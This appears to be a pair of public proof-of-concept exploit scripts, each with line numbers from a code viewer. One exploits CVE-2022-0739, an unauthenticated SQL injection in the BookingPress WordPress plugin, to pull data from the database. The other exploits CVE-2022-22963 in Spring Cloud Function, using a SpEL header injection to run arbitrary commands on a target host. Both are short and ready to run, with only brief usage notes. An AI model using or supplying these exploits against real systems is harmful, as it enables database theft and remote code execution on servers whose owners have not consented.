1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

# CVE-2022-0739
# ===================================
#
# Filename: booking-plugin-exploit.py
# Author: 4rtic f0x
# Description:
#
#       + We pass as the first parameter the SQLi in question; 
#         the script returns the response from the server with the filtered data.
#         For more information check wpscan
#
# ===================================

import os, sys,requests


wp_nonce="wp_nonce"
URL = "http://example.com/wp-admin/admin-ajax.php"


if __name__ == "__main__":
  data = {
	'action': 'bookingpress_front_get_category_services',
	'_wpnonce':wp_nonce,
	'category_id': 33,
	'total_service':'-7502) %s' % sys.argv[1]
  }
  resp = requests.post(URL,data=data)
  print(resp.text)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

#!/bin/env python3

# CVE-2022-22963
# ===================================
#
# Filename: spring_cloud_functionCV.py
# Author: 4rtic f0x
# Description:
#
#       + As a first argument we pass the ip address of the target device and
#       as a second argument the command to execute via RCE
#
# ===================================

import sys, requests

def help():
  print("[!] Usage: %s <target-ip> <command>" % sys.argv[0])
  exit(0)

if __name__ == "__main__":

  if len(sys.argv) != 3:
    help()

  URI = "http://%s/functionRouter" % sys.argv[1]
  RCE = 'T(java.lang.Runtime).getRuntime().exec("%s")' % sys.argv[2]
  rawdata = 'rawdata'
  headers = {
    'spring.cloud.function.routing-expression': RCE
  }

  try:
    server_response = requests.post(URI,headers=headers,data=rawdata)
  except:
    print("[!] EXCEPTION\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: ERROR" % (sys.argv[1],sys.argv[2]))
    exit(1)

  # print(server_response.text)

  if server_response.status_code == 500:
    print("[!] RCE: The command has been executed\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: OK" % (sys.argv[1],sys.argv[2]))
  else:
    print("[!] The server is not vulnerable\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: FAILED" % (sys.argv[1],sys.argv[2]))

  exit(0)